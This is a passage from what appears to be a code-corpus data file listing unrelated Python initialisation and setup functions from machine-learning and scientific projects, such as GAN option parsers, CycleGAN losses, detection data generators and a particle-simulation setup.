type=int, default=1,\n help='# of input image channels: 3 for RGB and 1 for grayscale')\n parser.add_argument('--output_nc', type=int, default=1,\n help='# of output image channels: 3 for RGB and 1 for grayscale')\n parser.add_argument('--f_map', type=list, default=[16, 32, 64, 128], help='# of gen filters in the last conv layer')\n parser.add_argument('--ngf', type=int, default=64, help='# of gen filters in the last conv layer')\n parser.add_argument('--ndf', type=int, default=64, help='# of discrim filters in the first conv layer')\n parser.add_argument('--netD', type=str, default='basic',\n help='specify discriminator architecture [basic | n_layers | pixel]. The basic model is a 70x70 PatchGAN. 
n_layers allows you to specify the layers in the discriminator')\n parser.add_argument('--typeG', type=str, default='unet',\n help='specify generator architecture [unet | resunet ]')\n parser.add_argument('--n_layers_D', type=int, default=4, help='only used if netD==n_layers')\n parser.add_argument('--norm', type=str, default='instance',\n help='instance normalization or batch normalization [instance | batch | none]')\n parser.add_argument('--init_type', type=str, default='normal',\n help='network initialization [normal | xavier | kaiming | orthogonal]')\n parser.add_argument('--init_gain', type=float, default=0.02,\n help='scaling factor for normal, xavier and orthogonal.')\n parser.add_argument('--no_dropout', action='store_true', help='no dropout for the generator')\n # dataset parameters\n parser.add_argument('--direction', type=str, default='AtoB', help='AtoB or BtoA')\n parser.add_argument('--serial_batches', action='store_true',\n help='if true, takes images in order to make batches, otherwise takes them randomly')\n parser.add_argument('--num_threads', default=4, type=int, help='# threads for loading data')\n parser.add_argument('--batch_size', type=int, default=16, help='input batch size')\n parser.add_argument('--crop_size', type=int, default=16, help='then crop to this size')\n parser.add_argument('--thickness', type=int, default=3, help='thickness when doing the cropping')\n parser.add_argument('--max_dataset_size', type=int, default=float(\"inf\"),\n help='Maximum number of samples allowed per dataset. If the dataset directory contains more than max_dataset_size, only a subset is loaded.')\n parser.add_argument('--preprocess', type=str, default='resize_and_crop',\n help='scaling and cropping of images at load time [resize_and_crop | crop | scale_width | scale_width_and_crop | none]')\n parser.add_argument('--no_flip', action='store_true',\n help='if specified, do not flip the images for data augmentation')\n parser.add_argument('--display_winsize', type=int, default=256,\n help='display window size for both visdom and HTML')\n # additional parameters\n parser.add_argument('--epoch', type=str, default='latest',\n help='which epoch to load? set to latest to use latest cached model')\n parser.add_argument('--load_iter', type=int, default='0',\n help='which iteration to load? if load_iter > 0, the code will load models by iter_[load_iter]; otherwise, the code will load models by [epoch]')\n parser.add_argument('--verbose', action='store_true', help='if specified, print more debugging information')\n parser.add_argument('--suffix', default='', type=str,\n help='customized suffix: opt.name = opt.name + suffix: e.g., {model}_{netG}_size{load_size}')\n parser.add_argument('--lambda_A', type=float, default=10.0, help='weight for cycle loss (A -> B -> A)')\n parser.add_argument('--lambda_B', type=float, default=10.0, help='weight for cycle loss (B -> A -> B)')\n parser.add_argument('--lambda_identity', type=float, default=0.5,\n help='use identity mapping. Setting lambda_identity other than 0 has an effect of scaling the weight of the identity mapping loss. 
For example, if the weight of the identity loss should be 10 times smaller than the weight of the reconstruction loss, please set lambda_identity = 0.1')\n parser.add_argument('--dim', type=int, default=2, help='2|3')\n parser.add_argument('--dataset', type=str, default='adni',help='select a dataset')\n parser.add_argument('--lambda_cc', type=float, default=0.5,help='use correlation coefficient loss if larger than 0')\n parser.add_argument('--lambda_tv', type=float, default=0.5,help='use total variance regularization if larger than 0')\n parser.add_argument('--fid', action='store_true',help='calculate frechet inception distance')\n parser.add_argument('--srenorm', action='store_true',help='using spatial adaptive denormalization')\n parser.add_argument('--joint_seg', action='store_true',help='learning segmentation instead of input segmentation map, and using spatial adaptive denormalization')\n parser.add_argument('--prob_seg', action='store_true',help='segmentation map is a probability')\n parser.add_argument('--load_epoch', type=int, default=0, help='continue training: the epoch to continue from')\n parser.add_argument('--load_step', type=int, default=0, help='continue training: the step to continue from')\n parser.add_argument('--sem_dropout', action='store_true', help='semantic dropout or not')\n parser.add_argument('--seg_nc', type=int, default=4, help='number of semantic class')\n parser.add_argument('--fold', type=float, default=0, help='fold id for LOOCV')\n parser.add_argument('--mask', action='store_true',help='add mask for brain')\n\n self.initialized = True\n return parser", "def __init__(self, gen):\n self.gen = gen", "def init():\n ########################\n # OPTIONS\n ########################\n # Debugging tools\n global TIMER # displays time of every major step\n TIMER = True\n global MONITOR # displays monitoring infos\n MONITOR = False\n \n global directories\n directories = {'1Face': 'data/1Face/',\n '2Faces': 'data/2Faces/',\n '3Faces': 'data/3Faces/',\n 'test': 'data/test/'}\n \n # Opt. swicthes\n global maxfinder # to find the max dim. 
amongst the pictures\n maxfinder = False\n global ML_mode\n ML_mode = {'CNN_Train': False,\n 'CNN_Pred' : True,\n 'Sampler': True}\n \n # Global variables\n global num_pics\n num_pics = {'1Face': 0,\n '2Faces': 0,\n '3Faces': 0}\n global labels\n labels = {'1Face': 0,\n '2Faces': 1,\n '3Faces': 2}\n global num_data\n num_data = 0\n global splitsize # Fraction of data to build the training set\n splitsize = 0.7 \n global maxheight # Resize the pictures to a power of 2 for CNN (2^8 here)\n maxheight = 128\n global maxwidth\n maxwidth = 128\n global TreshEdge # Number of consecutive black pixels to define an edge\n TreshEdge = 2\n global TreshFace # Number of white pixels to define a face (or large edge)\n TreshFace = maxheight/16", "def __init__(self):\n\n self.gm = GradientMapper()\n self.im = SpringMapper()\n self.fm = FullMapper(self.im, self.gm)\n # self.lm = LineMapper(self.fm)\n self.exit = False", "def __init__(self, hparams):\n # init superclass\n super(FastNeuralStyleSystem, self).__init__()\n self.hparams = hparams\n torch.manual_seed(hparams.seed)\n np.random.seed(hparams.seed)\n\n self.batch_size = hparams.batch_size\n if hparams.model == \"hrnet\":\n self.style_model = HRNet()\n else:\n self.style_model = TransformerNet()\n self.vgg_extractor = Vgg16(requires_grad=False)\n\n self.transform = transforms.Compose([\n transforms.Resize(hparams.image_size),\n transforms.CenterCrop(hparams.image_size),\n transforms.ToTensor(),\n transforms.Lambda(lambda x: x.mul(255))\n ])\n\n self.style_transform = transforms.Compose([\n transforms.Resize(hparams.image_size),\n transforms.CenterCrop(hparams.image_size),\n transforms.ToTensor(),\n transforms.Lambda(lambda x: x.mul(255))\n ])\n\n content_image = utils.load_image(\n self.hparams.content_image, scale=self.hparams.content_scale)\n self.content_image = self.style_transform(content_image)\n\n style = utils.load_image(os.path.join(\n 'images', 'style-images', f'{hparams.style_image}.jpg'), scale=0.5)\n style = self.style_transform(style).requires_grad_(False)\n self.style_image = style.repeat(hparams.batch_size, 1, 1, 1)\n\n self.features_style = self.vgg_extractor(\n utils.normalize_batch(self.style_image))\n self.gram_style = [utils.gram_matrix(y) for y in self.features_style]\n\n # self.temp_dir = f\"{self.hparams.output_dir}/{self.hparams.style_image}_steps_c_{self.hparams.content_weight}_s_{self.hparams.style_weight}\"\n # os.makedirs(self.temp_dir, exist_ok=True)", "def __init__(self, latent_dim=helpers.LATENT_DIM_IMG, img_size=helpers.IMG_SIZE, channels=helpers.CHANNELS):\n super(Generator, self).__init__()\n\n def block(in_feat, out_feat, normalize=True):\n layers = [nn.Linear(in_feat, out_feat)]\n if normalize:\n layers.append(nn.BatchNorm1d(out_feat, 0.8))\n layers.append(nn.LeakyReLU(0.2, inplace=True))\n return layers\n\n self.img_size = img_size\n self.channels = channels\n self.model = nn.Sequential(\n\n *block(latent_dim, 64, normalize=False),\n *block(64, 128),\n *block(128, 256),\n *block(256, 512),\n *block(512, 1024),\n nn.Linear(1024, channels*img_size*img_size),\n nn.Tanh()\n )", "def __init__(self, num_gpus):\n\n super(Generator, self).__init__()\n n_in = Z\n n_out = IMG_CHANNELS\n\n feature_map = IMG_SIZE\n kernel_size = 4\n stride = 2\n padding = 1\n bias = False\n\n self.num_gpus = num_gpus\n\n self.network = nn.Sequential(\n # input is latent variable space Z\n nn.ConvTranspose2d(n_in, feature_map * 8, kernel_size, 1, 0, bias=bias),\n nn.BatchNorm2d(feature_map * 8),\n nn.ReLU(inplace=True),\n\n # nodes = 
feature_map * 4\n nn.ConvTranspose2d(feature_map * 8, feature_map * 4, kernel_size, stride, padding, bias=bias),\n nn.BatchNorm2d(feature_map * 4),\n nn.ReLU(inplace=True),\n\n # nodes = feature_map * 2\n nn.ConvTranspose2d(feature_map * 4, feature_map * 2, kernel_size, stride, padding, bias=bias),\n nn.BatchNorm2d(feature_map * 2),\n nn.ReLU(inplace=True),\n\n # nodes = feature_map\n nn.ConvTranspose2d(feature_map * 2, feature_map, kernel_size, stride, padding, bias=bias),\n nn.BatchNorm2d(feature_map),\n nn.ReLU(inplace=True),\n\n # nodes = output image size\n nn.ConvTranspose2d(feature_map, n_out, kernel_size, stride, padding, bias=bias),\n nn.Tanh()\n )", "def build_gan(self):\n # make weights in the discriminator not trainable\n self.d_model.trainable = False\n # get noise and label inputs from generator model\n gen_noise, gen_label = self.g_model.input\n # get image output from the generator model\n gen_output = self.g_model.output\n # connect image output and label input from generator as inputs to discriminator\n gan_output = self.d_model([gen_output, gen_label])\n # define gan model as taking noise and label and outputting a classification\n self.gan_model = Model([gen_noise, gen_label], gan_output)\n # compile model\n opt = Adam(lr=0.0002, beta_1=0.5)\n self.gan_model.compile(loss='binary_crossentropy', optimizer=opt)", "def __init__(self, config, set_name, preprocess_image):\n\t\t\tself.data_dir = config['data_dir']\n\t\t\tself.set_name = set_name\n\t\t\tself.coco = COCO(os.path.join(self.data_dir, 'annotations', 'instances_' + set_name + '.json'))\n\t\t\tself.image_ids = self.coco.getImgIds()\n\t\t\tself.mask = config['mask']\n\n\t\t\tself.load_classes()\n\n\t\t\tsuper(CocoGenerator, self).__from_config__(config, preprocess_image=preprocess_image)", "def init():\n pass", "def create(self):\n # Create a graph and add all layers\n self.graph = tf.Graph()\n with self.graph.as_default():\n # Define variable learning rate and dis_noise\n self.relative_lr = tf.placeholder_with_default([1.],[1],name=\"relative_lr\")\n self.relative_lr = self.relative_lr[0]\n \n self.rel_dis_noise = tf.placeholder_with_default([1.],[1],name=\"rel_dis_noise\")\n self.rel_dis_noise = self.rel_dis_noise[0]\n self.dis_noise = self.rel_dis_noise * self.dis_noise_0\n \n \n # Create the generator and discriminator\n if self.architecture == 'Res6':\n gen_dim = [64, 128,256, 256,256,256,256,256,256, 128,64 ]\n kernel_size =[7, 3,3, 3,3,3,3,3,3, 3,3, 7]\n elif self.architecture == 'Res9':\n gen_dim= [64, 128,256, 256,256,256,256,256,256,256,256,256, 128,64 ]\n kernel_size=[7, 3,3, 3,3,3,3,3,3,3,3,3, 3,3, 7]\n else:\n print('Unknown generator architecture')\n return None\n \n self.genA = Res_Gen.ResGen('BtoA',self.a_chan,gen_dim=gen_dim,kernel_size=kernel_size,deconv=self.deconv,verbose=self.verbose)\n self.genB = Res_Gen.ResGen('AtoB',self.b_chan,gen_dim=gen_dim,kernel_size=kernel_size,deconv=self.deconv,verbose=self.verbose)\n \n if self.patchgan == 'Patch34':\n self.disA = PatchGAN34.PatchGAN34('A',noise=self.dis_noise)\n self.disB = PatchGAN34.PatchGAN34('B',noise=self.dis_noise)\n elif self.patchgan == 'Patch70':\n self.disA = PatchGAN70.PatchGAN70('A',noise=self.dis_noise)\n self.disB = PatchGAN70.PatchGAN70('B',noise=self.dis_noise)\n elif self.patchgan == 'Patch142':\n self.disA = PatchGAN142.PatchGAN142('A',noise=self.dis_noise)\n self.disB = PatchGAN142.PatchGAN142('B',noise=self.dis_noise)\n elif self.patchgan == 'MultiPatch':\n self.disA = MultiPatch.MultiPatch('A',noise=self.dis_noise)\n self.disB = 
MultiPatch.MultiPatch('B',noise=self.dis_noise)\n else:\n print('Unknown Patch discriminator type')\n return None\n \n self.disA_His = HisDis.HisDis('A',noise=self.dis_noise,keep_prob=1.)\n self.disB_His = HisDis.HisDis('B',noise=self.dis_noise,keep_prob=1.)\n \n # Create a placeholder for the input data\n self.A = tf.placeholder(tf.float32,[None, None, None, self.a_chan],name=\"a\")\n self.B = tf.placeholder(tf.float32,[None, None, None, self.b_chan],name=\"b\")\n \n if self.verbose:\n print('Size A: ' +str(self.a_chan)) # Often 1 --> Real\n print('Size B: ' +str(self.b_chan)) # Often 3 --> Syn\n \n # Create cycleGAN \n \n self.fake_A = self.genA.create(self.B,False)\n self.fake_B = self.genB.create(self.A,False)\n \n \n \n # Define the histogram loss\n t_A = tf.transpose(tf.reshape(self.A,[-1, self.a_chan]),[1,0])\n t_B = tf.transpose(tf.reshape(self.B,[-1, self.b_chan]),[1,0])\n t_fake_A = tf.transpose(tf.reshape(self.fake_A,[-1, self.a_chan]),[1,0])\n t_fake_B = tf.transpose(tf.reshape(self.fake_B,[-1, self.b_chan]),[1,0])\n\n self.s_A,_ = tf.nn.top_k(t_A,tf.shape(t_A)[1])\n self.s_B,_ = tf.nn.top_k(t_B,tf.shape(t_B)[1])\n self.s_fake_A,_ = tf.nn.top_k(t_fake_A,tf.shape(t_fake_A)[1])\n self.s_fake_B,_ = tf.nn.top_k(t_fake_B,tf.shape(t_fake_B)[1])\n \n self.m_A = tf.reshape(tf.reduce_mean(tf.reshape(self.s_A,[self.a_chan, self.imsize, -1]),axis=2),[1, -1])\n self.m_B = tf.reshape(tf.reduce_mean(tf.reshape(self.s_B,[self.b_chan, self.imsize, -1]),axis=2),[1, -1])\n self.m_fake_A = tf.reshape(tf.reduce_mean(tf.reshape(self.s_fake_A,[self.a_chan, self.imsize, -1]),axis=2),[1, -1])\n self.m_fake_B = tf.reshape(tf.reduce_mean(tf.reshape(self.s_fake_B,[self.b_chan, self.imsize, -1]),axis=2),[1, -1])\n \n # Define generator loss functions\n self.lambda_c = tf.placeholder_with_default([self.lambda_c],[1],name=\"lambda_c\")\n self.lambda_c = self.lambda_c[0]\n self.lambda_h = tf.placeholder_with_default([self.lambda_h],[1],name=\"lambda_h\")\n self.lambda_h = self.lambda_h[0]\n \n self.dis_real_A = self.disA.create(self.A,False)\n self.dis_real_Ah = self.disA_His.create(self.m_A,False)\n self.dis_real_B = self.disB.create(self.B,False)\n self.dis_real_Bh = self.disB_His.create(self.m_B,False)\n self.dis_fake_A = self.disA.create(self.fake_A,True)\n self.dis_fake_Ah = self.disA_His.create(self.m_fake_A,True)\n self.dis_fake_B = self.disB.create(self.fake_B,True)\n self.dis_fake_Bh = self.disB_His.create(self.m_fake_B,True)\n \n self.cyc_A = self.genA.create(self.fake_B,True)\n self.cyc_B = self.genB.create(self.fake_A,True)\n \n \n # Define cycle loss (eq. 2)\n self.loss_cyc_A = tf.reduce_mean(tf.abs(self.cyc_A-self.A))\n self.loss_cyc_B = tf.reduce_mean(tf.abs(self.cyc_B-self.B))\n \n self.loss_cyc = self.loss_cyc_A + self.loss_cyc_B\n \n # Define discriminator losses (eq. 
1)\n self.loss_dis_A = (tf.reduce_mean(tf.square(self.dis_real_A)) +\\\n tf.reduce_mean(tf.square(1-self.dis_fake_A)))*0.5 +\\\n (tf.reduce_mean(tf.square(self.dis_real_Ah)) +\\\n tf.reduce_mean(tf.square(1-self.dis_fake_Ah)))*0.5*self.lambda_h\n \n \n self.loss_dis_B = (tf.reduce_mean(tf.square(self.dis_real_B)) +\\\n tf.reduce_mean(tf.square(1-self.dis_fake_B)))*0.5 +\\\n (tf.reduce_mean(tf.square(self.dis_real_Bh)) +\\\n tf.reduce_mean(tf.square(1-self.dis_fake_Bh)))*0.5*self.lambda_h\n \n self.loss_gen_A = tf.reduce_mean(tf.square(self.dis_fake_A)) +\\\n self.lambda_h * tf.reduce_mean(tf.square(self.dis_fake_Ah)) +\\\n self.lambda_c * self.loss_cyc/2.\n self.loss_gen_B = tf.reduce_mean(tf.square(self.dis_fake_B)) +\\\n self.lambda_h * tf.reduce_mean(tf.square(self.dis_fake_Bh)) +\\\n self.lambda_c * self.loss_cyc/2.\n \n # Create the different optimizer\n with self.graph.as_default():\n # Optimizer for Gen\n self.list_gen = []\n for var in tf.trainable_variables():\n if 'gen' in str(var):\n self.list_gen.append(var)\n optimizer_gen = tf.train.AdamOptimizer(learning_rate=self.relative_lr*0.0002,beta1=0.5)\n self.opt_gen = optimizer_gen.minimize(self.loss_gen_A+self.loss_gen_B,var_list=self.list_gen)\n \n # Optimizer for Dis\n self.list_dis = []\n for var in tf.trainable_variables():\n if 'dis' in str(var):\n self.list_dis.append(var)\n optimizer_dis = tf.train.AdamOptimizer(learning_rate=self.relative_lr*0.0002,beta1=0.5)\n self.opt_dis = optimizer_dis.minimize(self.loss_dis_A + self.loss_dis_B,var_list=self.list_dis)", "def init():\n\n # Complete our stop words set.\n add_extra_words()\n\n model = read_model(MODEL_FILE)\n model_keys = list(model.keys())\n\n # Basic random.\n new_comment = generate_comment(model=model, order=2,\n number_of_sentences=2,\n initial_prefix=random.choice(model_keys))\n\n # Selective random.\n new_comment = generate_comment(model=model, order=2,\n number_of_sentences=2,\n initial_prefix=get_prefix(model_keys))\n\n # Context-aware.\n new_comment = generate_comment(model=model, order=2,\n number_of_sentences=2,\n initial_prefix=get_prefix_with_context(model, \"Agent_Phantom\"))\n\n print(new_comment)", "def generator_setup():\n PaaSPureGenerator()", "def __init__(self):\n\n self.parser = self.define_parser()\n self.pen = Pen()", "def Init(ss):\n rand.Seed(ss.RndSeed)\n ss.UpdateEnv()\n ss.StopNow = False\n ss.SetParams(\"\", False)\n ss.NewRun()\n ss.UpdateView(True)", "def __init__(self, dim, rn, gammak, sine=False, feature_generator=None):\n\n\t\tself.dim = dim\n\t\tself.rn = rn\n\t\tself.gammak = gammak\n\n\t\tif feature_generator is None:\n\t\t\tself.feature_generator = GaussianRandomFeatures(self.dim, self.rn, self.gammak, sine=sine)\n\t\telse: self.feature_generator = feature_generator", "def __init__(self, sid, split, library, style, **pargs):\n\n if 'print' not in pargs:\n pargs['print'] = (10**4, 'time', 'dt', 'atoms')\n\n self.rank = split.Get_rank()\n self.split = split\n self.pargs = pargs\n self.monitorList = []\n self.vars = {}\n self.path = os.getcwd()\n self.nSS = len(self.pargs['species'])\n self.output = self.pargs['output']\n self._dir, _ = __file__.split(__name__.split('PyGran.simulation.')[-1] + '.py')\n self._monitor = [] # a list of tuples of (varname, filename) to monitor\n\n if '__version__' in pargs:\n self.__version__ = self.pargs['__version__']\n\n if not self.rank:\n global logging\n\n logging = import_module(name='logging')\n\n logging.basicConfig(filename='pygran.log', format='%(asctime)s:%(levelname)s: %(message)s', 
level=logging.DEBUG)\n\n logging.info(\"Working in {}\".format(self.path))\n logging.info('Creating i/o directories')\n\n if not os.path.exists(self.pargs['traj']['dir']):\n os.makedirs(self.pargs['traj']['dir'])\n\n if self.pargs['restart']:\n if not os.path.exists(self.pargs['restart'][1]):\n os.makedirs(self.pargs['restart'][1])\n\n logging.info('Instantiating LIGGGHTS object')\n\n self.lmp = liggghts(comm=self.split, library=library.strip(), cmdargs=['-log', 'liggghts.log'])\n\n if not self.rank:\n logging.info('Setting up problem dimensions and boundaries')\n\n self.lmp.command('units {}'.format(self.pargs['units']))\n\n if hasattr(self, '__version__'): \n if self.__version__ >= 3.6:\n self.lmp.command('hard_particles yes')\n else:\n # Get version from version_liggghts.txt. TODO: find a faster way to do this.\n try:\n version_txt = find('version_liggghts.txt', '/')\n self.__liggghts__ = version_txt.split('version_liggghts.txt')[0]\n\n with open(version_txt, 'r+') as fp:\n major, minor, _ = fp.readline().rstrip().split('.')\n self.__version__ = float(major + '.' + minor)\n except:\n if not self.rank:\n print('Could not find LIGGGHTS version. Proceeding ... ')\n self.__version__ = 'unknown'\n self.__liggghts__ = 'n/a'\n\n # Write version + src dir to config file if it exists\n if not self.rank:\n if os.path.isfile(self._dir + '../.config'):\n with open(self._dir + '../.config', 'a+') as fp:\n fp.write('\\nversion={}'.format(self.__version__))\n fp.write('\\nsrc={}'.format(self.__liggghts__))\n if self.__version__ >= 3.6:\n self.lmp.command('hard_particles yes')\n\n self.lmp.command('dimension {}'.format(self.pargs['dim']))\n self.lmp.command('atom_style {}'.format(style))\n self.lmp.command('atom_modify map array') # array is faster than hash in looking up atomic IDs, but the former takes more memory\n self.lmp.command('boundary ' + ('{} ' * len(pargs['boundary'])).format(*pargs['boundary']))\n self.lmp.command('newton off') # turn off newton's 3rd law ~ should lead to better scalability\n self.lmp.command('communicate single vel yes') # have no idea what this does, but it's imp for ghost atoms\n self.lmp.command('processors * * *') # let LIGGGHTS handle DD", "def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.__iteration_number = kwargs['iteration_number']\n self.__particles = [\n PSOParticle(**kwargs, bit_generator=self._random)\n for _ in range(kwargs['particles'])\n ]\n\n # The library stores particles in the visualizer .... 
groan\n positions = [particle.position for particle in self.__particles]\n self._visualizer = NoVisualizer(**kwargs)\n self._visualizer.add_data(positions=positions)", "def create_generators(cfg, backbone):\n if cfg.anchor_params:\n if 'small' in cfg.anchor_params:\n anchor_params = AnchorParameters.small\n else:\n anchor_params = None\n else:\n anchor_params = None\n\n common_args = {\n 'batch_size': cfg.batchsize,\n 'config': None,\n 'image_min_side': cfg.image_size[0],\n 'image_max_side': cfg.image_size[1],\n 'filter_annotations_enabled': False,\n 'preprocess_image': backbone.preprocess_image,\n 'normalize_radar': cfg.normalize_radar,\n 'camera_dropout': cfg.dropout_image,\n 'radar_dropout': cfg.dropout_radar,\n 'channels': cfg.channels,\n 'distance': cfg.distance_detection,\n 'sample_selection': cfg.sample_selection,\n 'only_radar_annotated': cfg.only_radar_annotated,\n 'n_sweeps': cfg.n_sweeps,\n 'noise_filter': cfg.noise_filter_cfg,\n 'noise_filter_threshold': cfg.noise_filter_threshold,\n 'noisy_image_method': cfg.noisy_image_method,\n 'noise_factor': cfg.noise_factor,\n 'perfect_noise_filter': cfg.noise_filter_perfect,\n 'radar_projection_height': cfg.radar_projection_height,\n 'noise_category_selection': None if cfg.class_weights is None else cfg.class_weights.keys(),\n 'inference': cfg.inference,\n 'anchor_params': anchor_params,\n }\n\n # create random transform generator for augmenting training data\n if cfg.random_transform:\n transform_generator = random_transform_generator(\n min_rotation=-0.1,\n max_rotation=0.1,\n min_translation=(-0.1, -0.1),\n max_translation=(0.1, 0.1),\n min_shear=-0.1,\n max_shear=0.1,\n min_scaling=(0.9, 0.9),\n max_scaling=(1.1, 1.1),\n flip_x_chance=0.5,\n flip_y_chance=0.0,\n )\n else:\n transform_generator = random_transform_generator(flip_x_chance=0.5)\n\n category_mapping = cfg.category_mapping\n\n if 'nuscenes' in cfg.data_set:\n # import here to prevent unnecessary dependency on nuscenes\n from crfnet.data_processing.generator.nuscenes_generator import NuscenesGenerator\n from nuscenes.nuscenes import NuScenes\n\n if 'mini' in cfg.data_set:\n nusc = NuScenes(version='v1.0-mini', dataroot=cfg.data_path, verbose=True)\n else:\n try:\n nusc = NuScenes(version='v1.0-trainval', dataroot=cfg.data_path, verbose=True)\n except ValueError:\n nusc = NuScenes(version='v1.0-mini', dataroot=cfg.data_path, verbose=True)\n\n\n if 'debug' in cfg.scene_selection or 'mini' in cfg.data_set:\n scenes = Scenes.debug\n else:\n scenes = Scenes.default\n\n train_generator = NuscenesGenerator(\n nusc,\n scene_indices=scenes.train,\n transform_generator=transform_generator,\n category_mapping=category_mapping,\n compute_anchor_targets=anchor_targets_bbox,\n compute_shapes=guess_shapes,\n shuffle_groups=True,\n group_method='random',\n **common_args\n )\n\n # no dropouts in validation\n common_args['camera_dropout'] = 0\n common_args['radar_dropout'] = 0\n\n validation_generator = NuscenesGenerator(\n nusc,\n scene_indices=scenes.val,\n category_mapping=category_mapping,\n compute_anchor_targets=anchor_targets_bbox,\n compute_shapes=guess_shapes,\n **common_args\n )\n\n test_generator = NuscenesGenerator(\n nusc,\n scene_indices=scenes.test,\n category_mapping=category_mapping,\n compute_anchor_targets=anchor_targets_bbox,\n compute_shapes=guess_shapes,\n **common_args\n )\n\n test_night_generator = NuscenesGenerator(\n nusc,\n scene_indices=scenes.test_night,\n category_mapping=category_mapping,\n compute_anchor_targets=anchor_targets_bbox,\n 
compute_shapes=guess_shapes,\n **common_args\n )\n\n test_rain_generator = NuscenesGenerator(\n nusc,\n scene_indices=scenes.test_rain,\n category_mapping=category_mapping,\n compute_anchor_targets=anchor_targets_bbox,\n compute_shapes=guess_shapes,\n **common_args\n )\n return train_generator, validation_generator, test_generator, test_night_generator, test_rain_generator\n else:\n raise ValueError('Invalid data type received: {}'.format(cfg.data_set))", "def init(self, rng_key, num_warmup, init_params, model_args, model_kwargs):\n raise NotImplementedError", "def init():\n global neural_network\n global labels\n\n # load objects required by run() for inferencing\n model_dir = Model.get_model_path(\"mnist-fashion\")\n # neural model\n neural_network = keras.models.load_model(f\"{model_dir}/neural-network.h5\")\n # labels\n with open(f\"{model_dir}/labels.jsonpickle\", \"r\") as labels_file:\n labels = jsonpickle.decode(labels_file.read())", "def __init__(self,args,graph):\n self.args = args\n self.graph = graph\n self.targets = overlap_generator(self.args.target_weighting, self.graph)\n self.weights = overlap_generator(self.args.regularization_weighting, self.graph)\n self.nodes = self.graph.nodes()\n self.vocab_size = len(self.nodes)\n self.true_step_size = ((len(self.weights.keys()) / 2) * args.batch_size * self.args.epochs)\n self.edges = nx.edges(self.graph)\n self.build()", "def do_init(self):\n\n pass", "def __init_accessors (self):\n self.colors = ay.utils.Colors\n self.layout = Layout(self.seed)\n self.shapes = Shapes", "def __init__(self):\n # Passing the class make this Python 2 and Python 3 compatible\n super(MayaSceneLevelGeneratorUI, self).__init__(parent=maya_main_window())\n\n # Create the generators needed\n self._level_gen = level.LevelGenerator([blocks.BlockFile(\"\", blk_type) for blk_type in VALID_BLOCK_TYPES])\n self._scene_gen = MayaSceneLevelGenerator(None) # Fill in level at button press time\n\n # Window things\n self.setWindowTitle(\"Maya Scene Level Generator\")\n self.resize(500, 200)\n self.setWindowFlags(self.windowFlags() ^ PySide2.QtCore.Qt.WindowContextHelpButtonHint)\n\n # Set up for the first time\n self._create_widgets()\n self._create_layout()\n self._refresh_view()\n self._create_connections() # Order matters, since refreshing triggers connections\n\n print(self._level_gen.block_list) # TODO delete", "def create_initial_graph(self):\n # Initialise weights\n for link in self.gene_links:\n link.weight = random.uniform(weight_init_min, weight_init_max)\n # Initialise biases\n for node in self.gene_nodes:\n node.bias = random.uniform(bias_init_min, bias_init_max)\n if node.can_modify:\n node.act_func = self.act_set.get_random_activation_func()\n if node.act_func in [activations.gaussian, activations.sin]:\n if node.act_func.__name__[0] == \"g\":\n node.freq += random.uniform(-guass_freq_adjust, guass_freq_adjust)\n elif node.act_func.__name__[0] == \"s\":\n node.freq += random.uniform(-sin_freq_adjust, sin_freq_adjust)\n node.amp += random.uniform(-func_amp_adjust, func_amp_adjust)\n node.vshift += random.uniform(-func_vshift_adjust, func_vshift_adjust)", "def init():\r\n\t# add grabber tools based on proxy tools\r\n\tfor proxyWrapper in vizconnect.getToolsWithMode('Proxy'):\r\n\t\tgrabberTool = tools.grabber.HandGrabber(usingPhysics=False,\r\n\t\t\t\t\t\t\t\t\t\t\t\tusingSprings=False,\r\n\t\t\t\t\t\t\t\t\t\t\t\tplacementMode=tools.placer.MODE_DROP_DOWN)\r\n\t\t\r\n\t\tname = 'grabber_tool_based_on_'+proxyWrapper.getName()\r\n\t\tgrabberWrapper = 
vizconnect.addTool(raw=grabberTool,\r\n\t\t\t\t\t\t\t\t\t\t\tname=name,\r\n\t\t\t\t\t\t\t\t\t\t\tmake='Virtual',\r\n\t\t\t\t\t\t\t\t\t\t\tmodel='Grabber')\r\n\t\t# parent the grabber wrapper to the proxy's parent\r\n\t\tgrabberWrapper.setParent(proxyWrapper)\r\n\t\t\r\n\t\tgrabberTool.setItems(grabbableItems)\r\n\t\r\n\tviz.callback(viz.getEventID('RESET_THE_LOFT_LAYOUT'), lambda e: resetMovedObjects())", "def setup(self):\n\n self.parser = GingerIt()", "def setup_class(self):\n\n from scipy.spatial import cKDTree\n\n shape = (500, 500)\n\n # define random star positions\n nstars = 50\n from astropy.utils.misc import NumpyRNGContext\n with NumpyRNGContext(12345): # seed for repeatability\n xx = np.random.uniform(low=0, high=shape[1], size=nstars)\n yy = np.random.uniform(low=0, high=shape[0], size=nstars)\n\n # enforce a minimum separation\n min_dist = 25\n coords = [(yy[0], xx[0])]\n for xxi, yyi in zip(xx, yy):\n newcoord = [yyi, xxi]\n dist, distidx = cKDTree([newcoord]).query(coords, 1)\n if np.min(dist) > min_dist:\n coords.append(newcoord)\n yy, xx = np.transpose(coords)\n\n with NumpyRNGContext(12345): # seed for repeatability\n zz = np.random.uniform(low=0, high=200000., size=len(xx))\n\n # define a table of model parameters\n self.stddev = 2.\n sources = Table()\n sources['amplitude'] = zz\n sources['x_mean'] = xx\n sources['y_mean'] = yy\n sources['x_stddev'] = np.zeros(len(xx)) + self.stddev\n sources['y_stddev'] = sources['x_stddev']\n sources['theta'] = 0.\n\n self.data = make_gaussian_sources_image(shape, sources)\n self.nddata = NDData(self.data)\n\n init_stars = Table()\n init_stars['x'] = xx.astype(int)\n init_stars['y'] = yy.astype(int)\n self.init_stars = init_stars", "def init():\n global balls, super_balls\n\n balls = [gen_ball() for _ in range(number_of_balls)]\n super_balls = []\n generate_velocity_all_balls()", "def initialize_ai(self):\n\n self.gid, self.genome = constants.genomes_to_run[self.identifier]\n self.genome.fitness = -1\n self.net = neat.nn.FeedForwardNetwork.create(self.genome, constants.conf)\n # self.net = neat.nn.RecurrentNetwork\n # .create(self.genome, constants.conf)", "def setup_class(self):\n args = {'pdb_path':'/sdf/home/a/apeck/tomoxtal/examples/input/193l.pdb', 'resolution':6.0, 'size':250}\n\n # generate structure factors and retrieve associated cell information\n sf = cctbx_tools.reference_sf(args['pdb_path'], args['resolution'], expand_to_p1=True)\n sf_data = cctbx_tools.reformat_sf(sf)\n sg_symbol, sg_no, self.cell, cs = cctbx_tools.unit_cell_info(args['pdb_path'])\n \n # add random phase shifts\n hklIp1, hklIp2, hklIp3 = sf_data.copy(), sf_data.copy(), sf_data.copy()\n hklIp2[:,-1], 